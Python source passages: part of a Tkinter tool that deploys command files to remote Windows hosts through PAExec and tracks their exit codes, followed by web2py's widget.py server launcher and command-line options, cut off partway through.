n_targets): Settings.logger.info(f"INITIATED THREAD FOR {hostname}") cmd_location = os.path.join(Settings.temp_cmd_loc, f"{Settings.instance_uid}_{hostname}.cmd") start_time = time.time() height = 0 lines = "" errorlevels = set() break_loop, logged_overflow = False, False # Verify ping connection pingable = Utils.pingable( hostname, Settings.test_pings) if self.execution_is_remote else True if not pingable: connection.config(text='X', fg=Settings.red_three) errorlevel.config(text="NO PING", fg=Settings.red_three) else: connection.config(text="โœ”", fg=Settings.green_three) if not self.include_cmd_execution: errorlevel.config(text="NO ISSUE", fg=Settings.green_three) # Include execution and outputting of cmd/batch commands if self.include_cmd_execution and pingable and not self.kill: cmd_output_button.config(state='normal', cursor='hand2') cmd_output_button.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) cmd_output_button.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) if n_targets == 1: cmd_output_button.invoke() # Init process cmd_location = os.path.join(Settings.temp_cmd_loc, f"{Settings.instance_uid}_{hostname}.cmd") self.create_cmd_file(cmd_location) cmd = [Settings.paexec_loc, f"\\\\{hostname}", "-f", "-s", "-c", "-csrc", cmd_location, os.path.basename(cmd_location)] process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) # Killbutton config command killbutton.config(cursor='hand2', state='normal', command=lambda: self.kill_target(hostname, process)) killbutton.bind('<Enter>', Utils.lambdaf_event( Utils.obj_bg, status_name_, Settings.red_three), add="+") killbutton.bind('<Leave>', Utils.lambdaf_event( Utils.obj_bg, status_name_, Settings.bg_two), add="+") killbutton.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline')), add="+") killbutton.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, '')), add="+") # Start and read process read_line = time.time() for line in iter(process.stdout.readline, b''): read_line_delta = time.time() - read_line if self.kill: self.kill_target(hostname, process) break_loop = True # Decode line line = self.decode(line).rstrip() if len(line) < 1: continue if line.startswith("Ending time:"): break_loop = True if not errorlevel['text'] == 'ERROR' and 'ErrorLevel: ' in line: lvl = line[line.index("ErrorLevel: ") + len("ErrorLevel: "):] if (lvl.lstrip('-').isdigit()) or lvl.isdigit(): errorlevels.add(int(lvl)) color, text = self.get_err_color_text(errorlevels) errorlevel.config(text=text, fg=color) # Output insertion height += 1 if height-1 <= Settings.max_output: lines += f"{line}\n" if not Settings.use_buffer or (height % Settings.buffersize == 0) or break_loop or\ read_line_delta > Settings.max_buffertime: cmd_output.config(state='normal') cmd_output.insert("end", lines) if height <= Settings.max_output_height or n_targets == 1: cmd_output.config(height=height) cmd_output.config(state='disabled') lines = "" else: if not logged_overflow: cmd_output.config(state='normal') cmd_output.insert("end", f"Maximum output of {Settings.maxoutput} is reached") cmd_output.config(state='disabled') logged_overflow = True # New start time for calculating delta time read_line = time.time() if break_loop: break # Unexpected shutdown if not break_loop and self.include_cmd_execution and pingable or self.kill: errorlevel.config(text='KILLED', fg=Settings.red_three) if len(lines.rstrip()) == 0: Settings.logger.error(f"UNEXPECTED SHUTDOWN 
FOR {hostname}") else: Settings.logger.error(f"UNEXPECTED SHUTDOWN FOR {hostname} WITH OUTPUT\n{lines.rstrip()}") # Finalize for target if os.path.exists(cmd_location): os.remove(cmd_location) cmd_output.config(state='normal') cmd_output.delete("end-1c linestart", "end") cmd_output.config(state='disabled') status_name_.config(bg=Settings.bg_two, fg=Settings.green_three) killbutton.unbind('<Enter>') killbutton.unbind('<Leave>') if errorlevel['text'] == 'RUNNING': errorlevel.config(text='UNKNOWN') killbutton.config(state='disabled', cursor='arrow', font=("Verdana", 9, "")) runtime.config(text=time.strftime( "%H:%M:%S", time.gmtime(time.time()-start_time))) self.progressbar['value'] = self.progressbar['value'] + 1 self.current_running_threads -= 1 Settings.logger.info( f"TERMINATED THREAD FOR {hostname} WITH {height} READ LINES") def kill_running_targets(self): self.kill = True Settings.logger.info("KILL PROCESS FOR ALL TARGETS HAS BEEN INITIATED") self.kill_process_button.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.kill_process_button.unbind("<Enter>") self.kill_process_button.unbind("<Leave>") for button in self.kill_buttons: button.invoke() def kill_target(self, hostname, process): Settings.logger.info(f"KILL PROCESS HAS BEEN INITIATED FOR {hostname}") process.terminate() process.kill() killprocess = subprocess.Popen(['taskkill', '/S', hostname, '/F', '/T', '/IM', 'PAExec-*'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) for line in iter(killprocess.stdout.readline, b''): line = self.decode(line).rstrip() if len(line) < 1: continue else: Settings.logger.info(line) def get_err_color_text(self, levels): color = Settings.green_three text = "NO ISSUE" for level in levels: if not level in [0, 1641, 3010]: return Settings.red_three, "ERROR" elif level in [1641, 3010]: color = 'orange' text = "REBOOT" return color, text def set_max_workers(self): input_workers = str(self.workers_var.get()) if input_workers.isdigit() and int(input_workers) > 0: self.max_workers = int(input_workers) else: Settings.logger.error( "Max workers input is not a integer, or is lower than 1.") self.max_workers = Settings.default_workers def setup_canvas_frame(self): self.progression_frame = tkinter.Frame( self.progression_canvas, bg=Settings.bg_two) self.progression_frame.grid_columnconfigure(0, weight=1) self.progression_canvas.bind('<Enter>', lambda event: self.progression_canvas.bind_all( "<MouseWheel>", lambda e: Utils._on_mousewheel(e, self.progression_canvas))) self.progression_canvas.bind( '<Leave>', lambda e: self.progression_canvas.unbind_all("<MouseWheel>")) window = self.progression_canvas.create_window( (0, 0), window=self.progression_frame, anchor='nw') self.progression_frame.bind("<Configure>", lambda e: self.progression_canvas.configure( scrollregion=self.progression_canvas.bbox("all"))) self.progression_canvas.bind( '<Configure>', lambda e: self.progression_canvas.itemconfig(window, width=e.width)) self.progression_canvas.itemconfig( window, width=self.progression_canvas.winfo_width()) def exit_app(self): if Settings.running: if messagebox.askokcancel(title='Warning', message="Do you want to kill all running processes?"): t = threading.Thread(target=self.kill_running_targets, daemon=True) t.start() t.join() Settings.logger.info("ALL THREADS HAVE BEEN TERMINATED") else: return Utils.exit_app() def init_deployment(self, incl_execute=True): # Initialize and (re)set variables and fields if not self.first_run: self.progression_frame.destroy() self.kill = False self.first_run = 
False Settings.running = True self.kill_buttons = [] self.include_cmd_execution = incl_execute self.execution_is_remote = self.remote_var.get() self.remote_checkbutton.config( state='disabled', font=("Verdana", 8, ""), cursor='arrow') self.remote_checkbutton.unbind("<Enter>") self.remote_checkbutton.unbind("<Leave>") self.kill_process_button.config( state='normal', font=("Verdana", 9, ""), cursor='hand2') self.kill_process_button.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) self.kill_process_button.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) self.info_label.configure(text=Settings.install_state, fg='black') self.start_button.config(state="disabled", cursor='arrow') self.controller.protocol("WM_DELETE_WINDOW", lambda: threading.Thread(target=self.exit_app, daemon=True).start()) self.verify_targets.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.verify_targets.unbind("<Enter>") self.verify_targets.unbind("<Leave>") self.set_targets() self.progressbar['value'] = 0 self.progressbar['maximum'] = len(self.targets) self.current_running_threads = 0 self.set_max_workers() self.setup_canvas_frame() # Create threads for all hostnames and wait for all threads to finish if len(self.targets) > 0: threads = [] for hostname in self.targets: while self.current_running_threads >= self.max_workers: time.sleep(0.5) if self.kill: Settings.logger.info("STOPPED CREATING NEW TARGET FRAMES") break self.current_running_threads += 1 thread = threading.Thread(target=self.init_target_deployment, args=self.create_targetframe(hostname)) threads.append(thread) thread.start() self.progression_frame.update_idletasks() # Wait for all threads and end deployment for t in threads: t.join() self.deployment_finished() Settings.logger.info("ALL THREADS HAVE BEEN TERMINATED") def create_targetframe(self, hostname): status_frame = tkinter.Frame( self.progression_frame, bg=Settings.bg_two) status_frame.grid(sticky='news', padx=3, pady=3) status_frame.grid_columnconfigure(1, weight=1) status_frame.grid_rowconfigure(1, weight=1) output_button = tkinter.Button(status_frame, text="แ", font=('Verdana', 9), bg=Settings.bg_two, relief='flat', bd=0, anchor='w', activebackground=Settings.bg_two, state='disabled', width=2) output_button.grid(row=0, column=0, sticky='ew', padx=3) cmd_output_frame = tkinter.Frame(status_frame) cmd_output_frame.grid_columnconfigure(0, weight=1) cmd_output = tkinter.Text(cmd_output_frame, font=('Verdana', 7), bg='white', bd=2, relief='sunken', state='disabled', height=0, highlightthickness=0, selectbackground=Settings.bg_one, selectforeground=Settings.fg_one) cmd_output.grid(row=0, column=0, sticky="nsew") cmd_output_scrollbar = tkinter.Scrollbar(cmd_output_frame, command=cmd_output.yview, bg=Settings.bg_two) cmd_output_scrollbar.grid(row=0, column=1, sticky="news") cmd_output.config(yscrollcommand=cmd_output_scrollbar.set) output_button.config( command=Utils.lambdaf(self.show_hide_cmd_output_frame, output_button, cmd_output_frame)) status_name_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) status_name_frame.grid(row=0, column=1, sticky='ew') status_name_frame.grid_columnconfigure(1, weight=1) status_name = tkinter.Label(status_name_frame, text="Name:", anchor='w', font=('Verdana', 9), bg=Settings.bg_two) status_name.grid(row=0, column=0, sticky='ew') status_name_ = tkinter.Label(status_name_frame, text=hostname, anchor='w', borderwidth=1, relief="flat", font=('Verdana', 9, 'bold'), bg=Settings.bg_two) 
status_name_.grid(row=0, column=1, sticky='ew') connection_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) connection_frame.grid(row=0, column=4, sticky='ew') connection = tkinter.Label( connection_frame, text="Ping:", font=('Verdana', 9), bg=Settings.bg_two, anchor='w') connection.grid(row=0, column=1, sticky='ew') connection_ = tkinter.Label(connection_frame, font=('Verdana', 9, 'bold'), text='-', bg=Settings.bg_two, anchor='w', borderwidth=1, relief="flat", width=2) connection_.grid(row=0, column=2, sticky='ew') errorlevel_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) errorlevel_frame.grid(row=0, column=3) errorlevel = tkinter.Label( errorlevel_frame, text="State:", font=('Verdana', 9), bg=Settings.bg_two, anchor='w') errorlevel.grid(row=0, column=0, sticky='ew') errorlevel_ = tkinter.Label(errorlevel_frame, text="RUNNING", font=('Verdana', 9, 'bold'), bg=Settings.bg_two, anchor='w', borderwidth=1, relief="flat", width=10) errorlevel_.grid(row=0, column=1, sticky='ew') runtime_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) runtime_frame.grid(row=0, column=2, sticky='ew') runtime_frame.grid_columnconfigure(1, weight=1) runtime = tkinter.Label( runtime_frame, text="Runtime:", font=('Verdana', 9), bg=Settings.bg_two, anchor='e') runtime.grid(row=0, column=0, sticky='ew') runtime_ = tkinter.Label(runtime_frame, font=('Verdana', 9, 'bold'), bg=Settings.bg_two, anchor='w', borderwidth=1, relief="flat", width=10, text='-') runtime_.grid(row=0, column=1, sticky='ew') killbutton = tkinter.Button(status_frame, text="Kill", font=('Verdana', 9), bg=Settings.bg_two, anchor='e', relief="flat", activebackground=Settings.bg_two, bd=0, state='disabled', width=2) killbutton.grid(row=0, column=5, sticky='ew', padx=3) self.kill_buttons.append(killbutton) return (hostname, status_name_, output_button, killbutton, connection_, errorlevel_, runtime_, cmd_output, len(self.targets)) def show_hide_cmd_output_frame(self, button, textframe): if button['text'] == "แ": button.config(text="แƒ") textframe.grid(row=1, sticky="news", pady=2, columnspan=7) else: button.config(text="แ") textframe.grid_forget() def deployment_finished(self): Settings.running = False self.remote_checkbutton.config( state='normal', font=("Verdana", 8, ""), cursor='hand2') self.remote_checkbutton.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 8, 'underline'))) self.remote_checkbutton.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 8, ''))) self.kill_process_button.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.kill_process_button.unbind("<Enter>") self.kill_process_button.unbind("<Leave>") self.start_button.config(state='normal', cursor='hand2') if self.execution_is_remote: self.verify_targets.config(state='normal', font=( "Verdana", 9, ""), cursor='hand2') self.verify_targets.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) self.verify_targets.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) self.progressbar['value'] = self.progressbar['maximum']
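# --- Editor's sketch (not part of the original file) --------------------------
# init_target_deployment above drives PAExec through subprocess.Popen and
# consumes the combined stdout/stderr one line at a time via
# iter(process.stdout.readline, b''). Below is a minimal, GUI-free sketch of
# that streaming pattern; paexec_path, hostname and cmd_file are placeholder
# names, and the PAExec flags simply mirror the ones built above.
import os
import subprocess


def stream_remote_cmd(paexec_path, hostname, cmd_file):
    """Yield decoded output lines from a PAExec-launched remote command."""
    cmd = [paexec_path, f"\\\\{hostname}", "-f", "-s", "-c", "-csrc",
           cmd_file, os.path.basename(cmd_file)]
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT)
    # readline() returns b'' only once the child closes its output, so this
    # loop ends exactly when the remote command finishes.
    for raw in iter(process.stdout.readline, b''):
        line = raw.decode(errors="replace").rstrip()
        if line:
            yield line
    process.wait()


# Example use (hypothetical paths and host name):
#   for line in stream_remote_cmd(r"C:\tools\paexec.exe", "HOST01", r"C:\temp\job.cmd"):
#       print(line)
# ------------------------------------------------------------------------------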
widget.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ This file is part of the web2py Web Framework Copyrighted by Massimo Di Pierro <[email protected]> License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) The widget is called from web2py. """ import datetime import sys import cStringIO import time import thread import threading import os import socket import signal import math import logging import newcron import getpass import gluon.main as main from gluon.fileutils import read_file, write_file, create_welcome_w2p from gluon.settings import global_settings from gluon.shell import run, test from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo ProgramName = 'web2py Web Framework' ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str( datetime.datetime.now().year) ProgramVersion = read_file('VERSION').strip() ProgramInfo = '''%s %s %s''' % (ProgramName, ProgramAuthor, ProgramVersion) if not sys.version[:3] in ['2.5', '2.6', '2.7']: msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s' msg = msg % sys.version sys.stderr.write(msg) logger = logging.getLogger("web2py") def run_system_tests(options): """ Runs unittests for gluon.tests """ import subprocess major_version = sys.version_info[0] minor_version = sys.version_info[1] if major_version == 2: if minor_version in (5, 6): sys.stderr.write("Python 2.5 or 2.6\n") ret = subprocess.call(['unit2', '-v', 'gluon.tests']) elif minor_version in (7,): call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests'] if options.with_coverage: try: import coverage coverage_config = os.environ.get( "COVERAGE_PROCESS_START", os.path.join('gluon', 'tests', 'coverage.ini')) call_args = ['coverage', 'run', '--rcfile=%s' % coverage_config, '-m', 'unittest', '-v', 'gluon.tests'] except: sys.stderr.write('Coverage was not installed, skipping\n') sys.stderr.write("Python 2.7\n") ret = subprocess.call(call_args) else: sys.stderr.write("unknown python 2.x version\n") ret = 256 else: sys.stderr.write("Only Python 2.x supported.\n") ret = 256 sys.exit(ret and 1) class IO(object): """ """ def __init__(self): """ """ self.buffer = cStringIO.StringIO() def write(self, data): """ """ sys.__stdout__.write(data) if hasattr(self, 'callback'): self.callback(data) else: self.buffer.write(data) def get_url(host, path='/', proto='http', port=80): if ':' in host: host = '[%s]' % host else: host = host.replace('0.0.0.0', '127.0.0.1') if path.startswith('/'): path = path[1:] if proto.endswith(':'): proto = proto[:-1] if not port or port == 80: port = '' else: port = ':%s' % port return '%s://%s%s/%s' % (proto, host, port, path) def start_browser(url, startup=False): if startup: print 'please visit:' print '\t', url print 'starting browser...' 
try: import webbrowser webbrowser.open(url) except: print 'warning: unable to detect your browser' def presentation(root): """ Draw the splash screen """ import Tkinter root.withdraw() dx = root.winfo_screenwidth() dy = root.winfo_screenheight() dialog = Tkinter.Toplevel(root, bg='white') dialog.geometry('%ix%i+%i+%i' % (500, 300, dx / 2 - 200, dy / 2 - 150)) dialog.overrideredirect(1) dialog.focus_force() canvas = Tkinter.Canvas(dialog, background='white', width=500, height=300) canvas.pack() root.update() logo = os.path.join('extras','icons','splashlogo.gif') if os.path.exists(logo): img = Tkinter.PhotoImage(file=logo) pnl = Tkinter.Label(canvas, image=img, background='white', bd=0) pnl.pack(side='top', fill='both', expand='yes') # Prevent garbage collection of img pnl.image = img def add_label(text='Change Me', font_size=12, foreground='#195866', height=1): return Tkinter.Label( master=canvas, width=250, height=height, text=text, font=('Helvetica', font_size), anchor=Tkinter.CENTER, foreground=foreground, background='white' ) add_label('Welcome to...').pack(side='top') add_label(ProgramName, 18, '#FF5C1F', 2).pack() add_label(ProgramAuthor).pack() add_label(ProgramVersion).pack() root.update() time.sleep(5) dialog.destroy() return class web2pyDialog(object): """ Main window dialog """ def __init__(self, root, options): """ web2pyDialog constructor """ import Tkinter import tkMessageBox root.title('web2py server') self.root = Tkinter.Toplevel(root) self.options = options self.scheduler_processes = {} self.menu = Tkinter.Menu(self.root) servermenu = Tkinter.Menu(self.menu, tearoff=0) httplog = os.path.join(self.options.folder, 'httpserver.log') iconphoto = os.path.join('extras','icons','web2py.gif') if os.path.exists(iconphoto): img = Tkinter.PhotoImage(file=iconphoto) self.root.tk.call('wm', 'iconphoto', self.root._w, img) # Building the Menu item = lambda: start_browser(httplog) servermenu.add_command(label='View httpserver.log', command=item) servermenu.add_command(label='Quit (pid:%i)' % os.getpid(), command=self.quit) self.menu.add_cascade(label='Server', menu=servermenu) self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0) self.menu.add_cascade(label='Pages', menu=self.pagesmenu) #scheduler menu self.schedmenu = Tkinter.Menu(self.menu, tearoff=0) self.menu.add_cascade(label='Scheduler', menu=self.schedmenu) #start and register schedulers from options self.update_schedulers(start=True) helpmenu = Tkinter.Menu(self.menu, tearoff=0) # Home Page item = lambda: start_browser('http://www.web2py.com/') helpmenu.add_command(label='Home Page', command=item) # About item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo) helpmenu.add_command(label='About', command=item) self.menu.add_cascade(label='Info', menu=helpmenu) self.root.config(menu=self.menu) if options.taskbar: self.root.protocol('WM_DELETE_WINDOW', lambda: self.quit(True)) else: self.root.protocol('WM_DELETE_WINDOW', self.quit) sticky = Tkinter.NW # IP Tkinter.Label(self.root, text='Server IP:', justify=Tkinter.LEFT).grid(row=0, column=0, sticky=sticky) self.ips = {} self.selected_ip = Tkinter.StringVar() row = 0 ips = [('127.0.0.1', 'Local (IPv4)')] + \ ([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \ [(ip, 'Public') for ip in options.ips] + \ [('0.0.0.0', 'Public')] for ip, legend in ips: self.ips[ip] = Tkinter.Radiobutton( self.root, text='%s (%s)' % (legend, ip), variable=self.selected_ip, value=ip) self.ips[ip].grid(row=row, column=1, sticky=sticky) if row == 0: self.ips[ip].select() row += 1 shift = row # 
Port Tkinter.Label(self.root, text='Server Port:', justify=Tkinter.LEFT).grid(row=shift, column=0, sticky=sticky) self.port_number = Tkinter.Entry(self.root) self.port_number.insert(Tkinter.END, self.options.port) self.port_number.grid(row=shift, column=1, sticky=sticky) # Password Tkinter.Label(self.root, text='Choose Password:', justify=Tkinter.LEFT).grid(row=shift + 1, column=0, sticky=sticky) self.password = Tkinter.Entry(self.root, show='*') self.password.bind('<Return>', lambda e: self.start()) self.password.focus_force() self.password.grid(row=shift + 1, column=1, sticky=sticky) # Prepare the canvas self.canvas = Tkinter.Canvas(self.root, width=300, height=100, bg='black') self.canvas.grid(row=shift + 2, column=0, columnspan=2) self.canvas.after(1000, self.update_canvas) # Prepare the frame frame = Tkinter.Frame(self.root) frame.grid(row=shift + 3, column=0, columnspan=2) # Start button self.button_start = Tkinter.Button(frame, text='start server', command=self.start) self.button_start.grid(row=0, column=0) # Stop button self.button_stop = Tkinter.Button(frame, text='stop server', command=self.stop) self.button_stop.grid(row=0, column=1) self.button_stop.configure(state='disabled') if options.taskbar: import gluon.contrib.taskbar_widget self.tb = gluon.contrib.taskbar_widget.TaskBarIcon() self.checkTaskBar() if options.password != '<ask>': self.password.insert(0, options.password) self.start() self.root.withdraw() else: self.tb = None def update_schedulers(self, start=False): apps = [] available_apps = [arq for arq in os.listdir('applications/')] available_apps = [arq for arq in available_apps if os.path.exists( 'applications/%s/models/scheduler.py' % arq)] if start: #the widget takes care of starting the scheduler if self.options.scheduler and self.options.with_scheduler: apps = [app.strip() for app in self.options.scheduler.split(',') if app in available_apps] for app in apps: self.try_start_scheduler(app) #reset the menu self.schedmenu.delete(0, len(available_apps)) for arq in available_apps: if arq not in self.scheduler_processes: item = lambda u = arq: self.try_start_scheduler(u) self.schedmenu.add_command(label="start %s" % arq, command=item) if arq in self.scheduler_processes: item = lambda u = arq: self.try_stop_scheduler(u) self.schedmenu.add_command(label="stop %s" % arq, command=item) def start_schedulers(self, app): try: from multiprocessing import Process except: sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n') return code = "from gluon import current;current._scheduler.loop()" print 'starting scheduler from widget for "%s"...' 
% app args = (app, True, True, None, False, code) logging.getLogger().setLevel(self.options.debuglevel) p = Process(target=run, args=args) self.scheduler_processes[app] = p self.update_schedulers() print "Currently running %s scheduler processes" % ( len(self.scheduler_processes)) p.start() print "Processes started" def try_stop_scheduler(self, app): if app in self.scheduler_processes: p = self.scheduler_processes[app] del self.scheduler_processes[app] p.terminate() p.join() self.update_schedulers() def try_start_scheduler(self, app): if app not in self.scheduler_processes: t = threading.Thread(target=self.start_schedulers, args=(app,)) t.start() def checkTaskBar(self): """ Check taskbar status """ if self.tb.status: if self.tb.status[0] == self.tb.EnumStatus.QUIT: self.quit() elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE: if self.root.state() == 'withdrawn': self.root.deiconify() else: self.root.withdraw() elif self.tb.status[0] == self.tb.EnumStatus.STOP: self.stop() elif self.tb.status[0] == self.tb.EnumStatus.START: self.start() elif self.tb.status[0] == self.tb.EnumStatus.RESTART: self.stop() self.start() del self.tb.status[0] self.root.after(1000, self.checkTaskBar) def update(self, text): """ Update app text """ try: self.text.configure(state='normal') self.text.insert('end', text) self.text.configure(state='disabled') except: pass # ## this should only happen in case app is destroyed def connect_pages(self): """ Connect pages """ #reset the menu available_apps = [arq for arq in os.listdir('applications/') if os.path.exists( 'applications/%s/__init__.py' % arq)] self.pagesmenu.delete(0, len(available_apps)) for arq in available_apps: url = self.url + arq self.pagesmenu.add_command( label=url, command=lambda u=url: start_browser(u)) def quit(self, justHide=False): """ Finish the program execution """ if justHide: self.root.withdraw() else: try: scheds = self.scheduler_processes.keys() for t in scheds: self.try_stop_scheduler(t) except: pass try: newcron.stopcron() except: pass try: self.server.stop() except: pass try: self.tb.Destroy() except: pass self.root.destroy() sys.exit(0) def error(self, message): """ Show error message """ import tkMessageBox tkMessageBox.showerror('web2py start server', message) def start(self): """ Start web2py server """ password = self.password.get() if not password: self.error('no password, no web admin interface') ip = self.selected_ip.get() if not is_valid_ip_address(ip): return self.error('invalid host ip address') try: port = int(self.port_number.get()) except: return self.error('invalid port number') # Check for non default value for ssl inputs if (len(self.options.ssl_certificate) > 0 or len(self.options.ssl_private_key) > 0): proto = 'https' else: proto = 'http' self.url = get_url(ip, proto=proto, port=port) self.connect_pages() self.button_start.configure(state='disabled') try: options = self.options req_queue_size = options.request_queue_size self.server = main.HttpServer( ip, port, password, pid_filename=options.pid_filename, log_filename=options.log_filename, profiler_dir=options.profiler_dir, ssl_certificate=options.ssl_certificate, ssl_private_key=options.ssl_private_key, ssl_ca_certificate=options.ssl_ca_certificate, min_threads=options.minthreads, max_threads=options.maxthreads, server_name=options.server_name, request_queue_size=req_queue_size, timeout=options.timeout, shutdown_timeout=options.shutdown_timeout, path=options.folder, interfaces=options.interfaces) thread.start_new_thread(self.server.start, ()) except Exception, e: 
self.button_start.configure(state='normal') return self.error(str(e)) if not self.server_ready(): self.button_start.configure(state='normal') return self.button_stop.configure(state='normal') if not options.taskbar: thread.start_new_thread( start_browser, (get_url(ip, proto=proto, port=port), True)) self.password.configure(state='readonly') [ip.configure(state='disabled') for ip in self.ips.values()] self.port_number.configure(state='readonly') if self.tb: self.tb.SetServerRunning() def server_ready(self): for listener in self.server.server.listeners: if listener.ready: return True return False def stop(self): """ Stop web2py server """ self.button_start.configure(state='normal') self.button_stop.configure(state='disabled') self.password.configure(state='normal') [ip.configure(state='normal') for ip in self.ips.values()] self.port_number.configure(state='normal') self.server.stop() if self.tb: self.tb.SetServerStopped() def update_canvas(self): """ Update canvas """ try: t1 = os.path.getsize('httpserver.log') except: self.canvas.after(1000, self.update_canvas) return try: fp = open('httpserver.log', 'r') fp.seek(self.t0) data = fp.read(t1 - self.t0) fp.close() value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))] self.p0 = value for i in xrange(len(self.p0) - 1): c = self.canvas.coords(self.q0[i]) self.canvas.coords(self.q0[i], (c[0], self.p0[i], c[2], self.p0[i + 1])) self.t0 = t1 except BaseException: self.t0 = time.time() self.t0 = t1 self.p0 = [100] * 300 self.q0 = [self.canvas.create_line(i, 100, i + 1, 100, fill='green') for i in xrange(len(self.p0) - 1)] self.canvas.after(1000, self.update_canvas) def console(): """ Defines the behavior of the console web2py execution """ import optparse import textwrap usage = "python web2py.py" description = """\ web2py Web Framework startup script. ATTENTION: unless a password is specified (-a 'passwd') web2py will attempt to run a GUI. 
In this case command line options are ignored.""" description = textwrap.dedent(description) parser = optparse.OptionParser( usage, None, optparse.Option, ProgramVersion) parser.description = description msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); ' 'Note: This value is ignored when using the \'interfaces\' option.') parser.add_option('-i', '--ip', default='127.0.0.1', dest='ip', help=msg) parser.add_option('-p', '--port', default='8000', dest='port', type='int', help='port of server (8000)') msg = ('password to be used for administration ' '(use -a "<recycle>" to reuse the last password))') parser.add_option('-a', '--password', default='<ask>', dest='password', help=msg) parser.add_option('-c', '--ssl_certificate', default='', dest='ssl_certificate', help='file that contains ssl certificate') parser.add_option('-k', '--ssl_private_key', default='', dest='ssl_private_key', help='file that contains ssl private key') msg = ('Use this file containing the CA certificate to validate X509 ' 'certificates from clients') parser.add_option('--ca-cert', action='store', dest='ssl_ca_certificate', default=None, help=msg) parser.add_option('-d', '--pid_filename', default='httpserver.pid', dest='pid_filename', help='file to store the pid of the server') parser.add_option('-l', '--log_filename', default='httpserver.log', dest='log_filename', help='file to log connections') parser.add_option('-n', '--numthreads', default=None, type='int', dest='numthreads', help='number of threads (deprecated)') parser.add_option('--minthreads', default=None, type='int', dest='minthreads', help='minimum number of server threads') parser.add_option('--maxthreads', default=None, type='int', dest='maxthreads', help='maximum number of server threads') parser.add_option('-s', '--server_name', default=socket.gethostname(), dest='server_name', help='server name for the web server') msg = 'max number of queued requests when server unavailable' parser.add_option('-q', '--request_queue_size', default='5', type='int', dest='request_queue_size', help=msg) parser.add_option('-o', '--timeout', default='10', type='int', dest='timeout', help='timeout for individual request (10 seconds)') parser.add_option('-z', '--shutdown_timeout', default='5', type='int', dest='shutdown_timeout', help='timeout on shutdown of server (5 seconds)') parser.add_option('--socket-timeout', default=5, type='int', dest='socket_timeout', help='timeout for socket (5 second)') parser.add_option('-f', '--folder', default=os.getcwd(), dest='folder', help='folder from which to run web2py') parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False, help='increase --test verbosity') parser.add_option('-Q', '--quiet', action='store_true', dest='quiet', default=False, help='disable all output') msg = ('set debug output level (0-100, 0 means all, 100 means none; ' 'default is 30)') parser.add_option('-D', '--debug', dest='debuglevel', default=30, type='int', help=msg) msg = ('run web2py in interactive shell or IPython (if installed) with ' 'specified appname (if app does not exist it will be created). 
' 'APPNAME like a/c/f (c,f optional)') parser.add_option('-S', '--shell', dest='shell', metavar='APPNAME', help=msg) msg = ('run web2py in interactive shell or bpython (if installed) with ' 'specified appname (if app does not exist it will be created).\n' 'Use combined with --shell') parser.add_option('-B', '--bpython', action='store_true', default=False, dest='bpython', help=msg) msg = 'only use plain python shell; should be used with --shell option' parser.add_option('-P', '--plain', action='store_true', default=False, dest='plain', help=msg) msg = ('auto import model files; default is False; should be used ' 'with --shell option') parser.add_option('-M', '--import_models', action='store_true', default=False, dest='import_models', help=msg) msg = ('run PYTHON_FILE in web2py environment; ' 'should be used with --shell option') parser.add_option('-R', '--run', dest='run', metavar='PYTHON_FILE', default='', help=msg) msg = ('run scheduled tasks for the specified apps: expects a list of ' 'app names as -K app1,app2,app3 ' 'or a list of app:groups as -K app1:group1:group2,app2:group1 ' 'to override specific group_names. (only strings, no spaces ' 'allowed. Requires a scheduler defined in the models') parser.add_option('-K', '--scheduler', dest='scheduler', default=None, help=msg) msg = 'run schedulers alongside webserver, needs -K app1 and -a too' parser.add_option('-X', '--with-scheduler', action='store_true', default=False, dest='with_scheduler', help=msg) msg = ('run doctests in web2py environment; ' 'TEST_PATH like a/c/f (c,f optional)') parser.add_option('-T', '--test', dest='test', metavar='TEST_PATH', default=None, help=msg) msg = 'trigger a cron run manually; usually invoked from a system crontab' parser.add_option('-C', '--cron', action='store_true', dest='extcron', default=False, help=msg) msg = 'triggers the use of softcron' parser.add_option('--softcron', action='store_true', dest='softcron', default=False, help=msg) parser.add_option('-Y', '--run-cron', action='store_true', dest='runcron', default=False, help='start the background cron process') parser.add_option('-J', '--cronjob', action='store_true', dest='cronjob', default=False, help='identify cron-initiated command') parser.add_option('-L', '--config', dest='config', default='', help='config file') parser.add_option('-F', '--profiler', dest='profiler_dir', default=None, help='profiler dir') parser.add_option('-t', '--taskbar', action='store_true', dest='taskbar', default=False, help='use web2py gui and run in taskbar (system tray)') parser.add_option('', '--nogui', action='store_true', default=False, dest='nogui', help='text-only, no GUI') msg = ('should be followed by a list of arguments to be passed to script, ' 'to be used with -S, -A must be the last option') 